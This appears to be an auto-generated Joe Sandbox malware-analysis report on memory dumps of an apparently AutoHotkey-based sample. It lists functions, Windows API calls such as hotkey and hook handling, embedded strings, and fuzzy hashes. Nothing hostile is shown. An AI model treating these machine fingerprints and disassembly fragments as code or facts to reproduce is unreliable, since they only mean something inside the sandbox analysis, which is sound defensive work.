FAIL, xrefs: 00440CE5, 00440D00, 00440E1D, 00440E3E, 00440E5A

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Window$ForegroundMessageSendTimeoutVisible
String ID: $%K$FAIL
API String ID: 578228273-1169411956
Opcode ID: 3880db1b907df811983a3b591f6221b153b50c0d251933d8842aeedd071e7074
Instruction ID: ce2aa06734a1c75c5bde3df132adb7a22ea8c390c626ed481d29122dec2b31e0
Opcode Fuzzy Hash: 3880db1b907df811983a3b591f6221b153b50c0d251933d8842aeedd071e7074
Instruction Fuzzy Hash: 71A137717042009BE724DF58D8C1B27B795EB85324F24866FEA458B3C2D779EC95C788

Uniqueness

Uniqueness Score: -1.00%

Function 0042C260, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263COMMON

Download Yara Rule

Strings

Not allowed as an output variable., xrefs: 0042C575
This dynamically built variable name is too long. If this variable was not intended to be dynamic, remove the % symbols from it., xrefs: 0042C3EF, 0042C40B, 0042C42F
This dynamic variable is blank. If this variable was not intended to be dynamic, remove the % symbols from it., xrefs: 0042C44E

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID:
String ID: Not allowed as an output variable.$This dynamic variable is blank. If this variable was not intended to be dynamic, remove the % symbols from it.$This dynamically built variable name is too long. If this variable was not intended to be dynamic, remove the % symbols from it.
API String ID: 0-4078995249
Opcode ID: bcb218404c281d6fdd2931ffa877d805780b788825002c1b35c34bd107d7b602
Instruction ID: 40aca71c16507a5e3f46b6607a9442e648f694e33212fd620554171d68d2ffb5
Opcode Fuzzy Hash: bcb218404c281d6fdd2931ffa877d805780b788825002c1b35c34bd107d7b602
Instruction Fuzzy Hash: 9581F231740220ABDB10EB25FC91BBE73A1EB91758FA0846BE904C7280D779ED45C3AD

Uniqueness

Uniqueness Score: -1.00%

Function 00416430, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 172COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 00416534
__fassign.LIBCMT ref: 00416561

Part of subcall function 0049A69D: wcstoxl.LIBCMT ref: 0049A6AD

Strings

,, xrefs: 004164B3
MHA, xrefs: 0041644E

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __fassign$wcstoxl
String ID: ,$MHA
API String ID: 3403923588-528934878
Opcode ID: d3e9f0e1387fac613eea6ab9d7fffddceb3cff64e56210bed8065f6ed1379fb5
Instruction ID: e60f667e4c5d026badb3a57c36a58a60ceb54a5e8c981e28f4002533ea2d6f56
Opcode Fuzzy Hash: d3e9f0e1387fac613eea6ab9d7fffddceb3cff64e56210bed8065f6ed1379fb5
Instruction Fuzzy Hash: A651D2B0500211ABDB218F14D8417BBB3A2AF95708F1A485AECC59B385E77DDDC1C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 00444FC0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 147windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000402,?,?), ref: 0044515E

Strings

https://autohotkey.com, xrefs: 004450F2
Could not open URL https://autohotkey.com in default browser., xrefs: 0044510F
The script could not be reloaded., xrefs: 0044501D

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: MessagePost
String ID: Could not open URL https://autohotkey.com in default browser.$The script could not be reloaded.$https://autohotkey.com
API String ID: 410705778-3701227902
Opcode ID: 6b0d414c8c27b2b18db692f59f3526f22e6e519eb73301ab588d0be83d0c2dcf
Instruction ID: 36dfd8aa6b5f97f2e94760c7db9f97b869aa0dd53bc89ff285a35d2deafd1201
Opcode Fuzzy Hash: 6b0d414c8c27b2b18db692f59f3526f22e6e519eb73301ab588d0be83d0c2dcf
Instruction Fuzzy Hash: 9731F97860110117EE04ABA178D2BBB23949B90305F2854AFF5544F383DB6F98537B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00438950, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0047E600: _vswprintf_s.LIBCMT ref: 0047E619

GetTickCount.KERNEL32 ref: 00438A41

Strings

Press [F5] to refresh., xrefs: 00438B22
Script lines most recently executed (oldest first). Press [F5] to refresh. The seconds elapsed between a line and the one after , xrefs: 0043895B
---- %s, xrefs: 00438A7C

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: CountTick_vswprintf_s
String ID: Press [F5] to refresh.$---- %s$Script lines most recently executed (oldest first). Press [F5] to refresh. The seconds elapsed between a line and the one after
API String ID: 1349412622-1384135373
Opcode ID: 8ad9347002ee756d29533ad491674c40e589f05d5368c2710f7fbc9501adb4b2
Instruction ID: 77a04527e67732d633e864ac32662770d3cbb16ab66817cbafa3dffe57d41a4a
Opcode Fuzzy Hash: 8ad9347002ee756d29533ad491674c40e589f05d5368c2710f7fbc9501adb4b2
Instruction Fuzzy Hash: D151F8705083028FC710EF2DD58466AB7E0AB98314F544A3FF84587395EA38D949CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00452470, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00452592

Part of subcall function 004985DD: HeapFree.KERNEL32(00000000,00000000,?,0049C453,00000000,?,0049D9F0,?,0047E61E), ref: 004985F3
Part of subcall function 004985DD: GetLastError.KERNEL32(00000000,?,0049C453,00000000,?,0049D9F0,?,0047E61E), ref: 00498605

Strings

Count, xrefs: 004524BB
object, xrefs: 00452490
array, xrefs: 00452507

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID: Count$array$object
API String ID: 1353095263-899595868
Opcode ID: 4c5b95dfc8ec697a5d85ce0668d1df2ad66418fcafd69c3ab0974d9420489c9e
Instruction ID: f48aa1cd64b37f5654d583306f01b4294fbc8d7d59498781dd86f59ddeff133b
Opcode Fuzzy Hash: 4c5b95dfc8ec697a5d85ce0668d1df2ad66418fcafd69c3ab0974d9420489c9e
Instruction Fuzzy Hash: 52411371618300AFC308CF59C890A5BB7E5FB99314F108A1EF59987290EB75E949CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0043E5F0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0043E610

Part of subcall function 0049853E: __FF_MSGBANNER.LIBCMT ref: 00498557
Part of subcall function 0049853E: __NMSG_WRITE.LIBCMT ref: 0049855E
Part of subcall function 0049853E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0049E811,004011D4,00000001,004011D4,?,0049D07D,00000018,004CE9B0,0000000C,0049D10D), ref: 00498583

_free.LIBCMT ref: 0043E647
_malloc.LIBCMT ref: 0043E655

Strings

Out of memory., xrefs: 0043E66C

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: _malloc$AllocateHeap_free
String ID: Out of memory.
API String ID: 1159278337-4087320997
Opcode ID: d9c27b6dc48658e91f425124346438fed970c91c4caca964a7a89115f4a479be
Instruction ID: 88c1b03e6f8098c4ef41a79f2522652cb1c0c8b99a3999074659b07af4c934be
Opcode Fuzzy Hash: d9c27b6dc48658e91f425124346438fed970c91c4caca964a7a89115f4a479be
Instruction Fuzzy Hash: 27410CB06017018BD7249F2AC482B27B3E1FF5D354F54592FD48A87B80E779E892CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004490B0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 0041C100: __wcsicoll.LIBCMT ref: 0041C118

_wcsncpy.LIBCMT ref: 00449102
SetVolumeLabelW.KERNEL32(?,?), ref: 0044916B

Part of subcall function 00448CC0: _wcsncpy.LIBCMT ref: 00448CF8
Part of subcall function 00448CC0: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00448D5C

Strings

\, xrefs: 00449131
$%K, xrefs: 0044917A

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: _wcsncpy$DiskFreeLabelSpaceVolume__wcsicoll
String ID: $%K$\
API String ID: 1863641975-2322972557
Opcode ID: 16777e6d37da3e86e79517493733e6e01c8f9cffb5a541c9b469687af3b777fe
Instruction ID: 3a15300cc2f27f9ece4c3b99a50e1d2665830d547c0be23593c033a9c12ab917
Opcode Fuzzy Hash: 16777e6d37da3e86e79517493733e6e01c8f9cffb5a541c9b469687af3b777fe
Instruction Fuzzy Hash: 90313572B0420057E720AB5E9C85FABB3D8EB95320F15463FFA59C7390EA799C40D399

Uniqueness

Uniqueness Score: -1.00%

Function 00408F0E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00408F6C
__wcstoi64.LIBCMT ref: 00408FA3

Strings

file:///, xrefs: 00408F21
file://, xrefs: 00408F4B

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcstoi64_memmove
String ID: file://$file:///
API String ID: 3802750240-3202756431
Opcode ID: 91c86b219283d64a170b0645a94feb8d4122da84c4a8cd5ef6d58c4c9c8b6c97
Instruction ID: c2a11289926bb4e9a1d2ae9ee4781c7b50d712805d407f322f0921a76f80b43d
Opcode Fuzzy Hash: 91c86b219283d64a170b0645a94feb8d4122da84c4a8cd5ef6d58c4c9c8b6c97
Instruction Fuzzy Hash: F4212F619042557ADB11977D8D41FDFBFB85F22300F14007FE8C573242E6786A458769

Uniqueness

Uniqueness Score: -1.00%

Function 00403940, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNEL32(004AE8F8,?,00000000,00403458,?,00000000), ref: 004039B5
GetTickCount.KERNEL32 ref: 00403A27

Strings

e, xrefs: 004039D0
@cM, xrefs: 00403961

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: CountCurrentDirectoryTick
String ID: @cM$e
API String ID: 2167818035-53517659
Opcode ID: dd46d592d4d00105bac9dc4f528a8ea9cf718dcb83847ec55f6042fe93523ffd
Instruction ID: b59f29361739d8350713e70f704453a0fa7c26080b602f22626589389b49a42e
Opcode Fuzzy Hash: dd46d592d4d00105bac9dc4f528a8ea9cf718dcb83847ec55f6042fe93523ffd
Instruction Fuzzy Hash: B0214BB0A057819EE724CF25E804357BFE4AB46316F04897FE496A63D1C3B89A85CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0040E910, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0040E928
__wcsicoll.LIBCMT ref: 0040E975

Strings

Off, xrefs: 0040E96F
$%K, xrefs: 0040E938

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: $%K$Off
API String ID: 3832890014-490522100
Opcode ID: 54ae7a411fdb5226ef6bb69bcda0816b3fd9a577464317659e724c99883802d6
Instruction ID: 937630d5df7bc88c7e3da056f3d537ec944726adaaf441194905c6ed24db2c99
Opcode Fuzzy Hash: 54ae7a411fdb5226ef6bb69bcda0816b3fd9a577464317659e724c99883802d6
Instruction Fuzzy Hash: 9411E0C161010291EAB06B378E013B770929F31B50F880E3BD845F63D9F36ECEA1C259

Uniqueness

Uniqueness Score: -1.00%

Function 0041DBC0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041DBD0
_wcsncpy.LIBCMT ref: 0041DC42
Shell_NotifyIconW.SHELL32(00000000,004D89A2), ref: 0041DC55

Strings

AutoHotkey, xrefs: 0041DC33, 0041DC3A

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: IconNotifyShell__memset_wcsncpy
String ID: AutoHotkey
API String ID: 1481257660-348589305
Opcode ID: 0ed11590f498f9b36fd6eaafc0804a0054876d399ab9458c5601f5ee6f89d507
Instruction ID: bdc6926eacbd192bd5083b52c0300dd36793e47b1f82d551d2fcc08be41b14f3
Opcode Fuzzy Hash: 0ed11590f498f9b36fd6eaafc0804a0054876d399ab9458c5601f5ee6f89d507
Instruction Fuzzy Hash: FA115BB0A007019BEB70CF39C889B9777E8EB45308F00482EE55AD7340F7B8A944C758

Uniqueness

Uniqueness Score: -1.00%

Function 004837E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(dwmapi.dll,DwmGetWindowAttribute,?,00482AB4,00000000,?,?,?,?,0040EC48,004D6340,?,?,004AE8F8,004AE8F8,00000000), ref: 004837FB
GetProcAddress.KERNEL32(00000000), ref: 00483802

Strings

DwmGetWindowAttribute, xrefs: 004837F1
dwmapi.dll, xrefs: 004837F6

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: DwmGetWindowAttribute$dwmapi.dll
API String ID: 2574300362-1753671286
Opcode ID: 1579e588d38f24715f9f4005f49795df6c816119f81c9a4804f2572af820d865
Instruction ID: f523609c06051cb92c407278eb827a151a3280f2c2d72b830b64e1b364b760f0
Opcode Fuzzy Hash: 1579e588d38f24715f9f4005f49795df6c816119f81c9a4804f2572af820d865
Instruction Fuzzy Hash: 94F09AB4254301AAEB54FF64DC09B0E3BE4AB85F02F20482FF146C25A0DBB8C940DB29

Uniqueness

Uniqueness Score: -1.00%

Function 0042C600, Relevance: 6.2, APIs: 4, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 664968686462f128491137b59cc2fbf13e4ab932fceb97fdf696eebfe499c550
Instruction ID: 7d9a09bcbea6b212cbe84c7a73f2c8236a1df6b7b4a7b42f5e314bf9d15bc6ff
Opcode Fuzzy Hash: 664968686462f128491137b59cc2fbf13e4ab932fceb97fdf696eebfe499c550
Instruction Fuzzy Hash: 7E81CF367083559BC730DA18E8C4BABB3E1AFC8314F98456EE98557342D739E806CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0047E7A0, Relevance: 6.2, APIs: 4, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ded0f377b93b7c25bf2e11914713572aa5e3910fd8cd682ac07771aa44e6c88
Instruction ID: c8ab6cb5c9b6c2a5d2e4f18aacd66b22513994f5125fb88a9ecd2646c5787b9c
Opcode Fuzzy Hash: 4ded0f377b93b7c25bf2e11914713572aa5e3910fd8cd682ac07771aa44e6c88
Instruction Fuzzy Hash: D451FAB29043159BCB109F1AC8805BF77E1AF8C314F5286ABF98997340E339D945C79B

Uniqueness

Uniqueness Score: -1.00%

Function 00482980, Relevance: 6.1, APIs: 4, Instructions: 142windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,0040EC48,004D6340,?,?,004AE8F8,004AE8F8,00000000), ref: 004829D7
IsWindowVisible.USER32(00000000), ref: 004829F3
GetForegroundWindow.USER32(?,?,?,?,0040EC48,004D6340,?,?,004AE8F8,004AE8F8,00000000), ref: 00482A33
IsWindowVisible.USER32(00000000), ref: 00482AA0

Part of subcall function 004837E0: LoadLibraryW.KERNEL32(dwmapi.dll,DwmGetWindowAttribute,?,00482AB4,00000000,?,?,?,?,0040EC48,004D6340,?,?,004AE8F8,004AE8F8,00000000), ref: 004837FB
Part of subcall function 004837E0: GetProcAddress.KERNEL32(00000000), ref: 00483802

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Window$ForegroundVisible$AddressLibraryLoadProc
String ID:
API String ID: 559202094-0
Opcode ID: 289173ba89e25c1425fa632e34dfa24030cd7fa74b08849206b7d830bc07db94
Instruction ID: d671b33b1647259e9114a1bcb430dff8e1ffd463b6f018c892004e77dfead9cd
Opcode Fuzzy Hash: 289173ba89e25c1425fa632e34dfa24030cd7fa74b08849206b7d830bc07db94
Instruction Fuzzy Hash: D2519F71A443808BC738BF6599805EFB7E5FF81340F444D6EEA4887340EB795941CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004A39B4, Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004A39E8
__isleadbyte_l.LIBCMT ref: 004A3A1B
MultiByteToWideChar.KERNEL32(00000080,00000009,00498C01,?,00000000,00000000,?,?,?,?,00498C01,00000000), ref: 004A3A4C
MultiByteToWideChar.KERNEL32(00000080,00000009,00498C01,00000001,00000000,00000000,?,?,?,?,00498C01,00000000), ref: 004A3ABA

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 9e9d33ba9c1bce4b6cad205c9468e679d9bed3c38f7da51bd382095e275126a9
Instruction ID: c05d1a19e665517eea5435da4b47a262f1d6134d4ab43ba55798dab35bd62983
Opcode Fuzzy Hash: 9e9d33ba9c1bce4b6cad205c9468e679d9bed3c38f7da51bd382095e275126a9
Instruction Fuzzy Hash: 9931F171A00255EFDB20DFA4C881AAB3BA4AF12312B14856AF0958B291F734DE40DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040F520, Relevance: 6.1, APIs: 4, Instructions: 93windowCOMMON

Download Yara Rule

APIs

PostQuitMessage.USER32(00000000), ref: 0040F525

Part of subcall function 0040DE90: CreateThread.KERNEL32(00000000,00002000,0040E1C0,00000000,00000000,004D6600), ref: 0040DEEA
Part of subcall function 0040DE90: SetThreadPriority.KERNEL32(00000000,0000000F,?,00408928,?,00408545,An internal error has occurred in the debugger engine.Continue running the script without the debugger?,?,00000001,00406035,?,?,00000001), ref: 0040DF00
Part of subcall function 0040DE90: PostThreadMessageW.USER32 ref: 0040DF24
Part of subcall function 0040DE90: Sleep.KERNEL32(0000000A,?,00408928,?,00408545,An internal error has occurred in the debugger engine.Continue running the script without the debugger?,?,00000001,00406035,?,?,00000001), ref: 0040DF30
Part of subcall function 0040DE90: GetTickCount.KERNEL32 ref: 0040DF47
Part of subcall function 0040DE90: PeekMessageW.USER32 ref: 0040DF6A

UnhookWindowsHookEx.USER32(?), ref: 0040F541
UnregisterHotKey.USER32(?,?,004D8690,004D8690,?,00000000), ref: 0040F58E
UnregisterHotKey.USER32(?,?,00000000), ref: 0040F5F2

Memory Dump Source

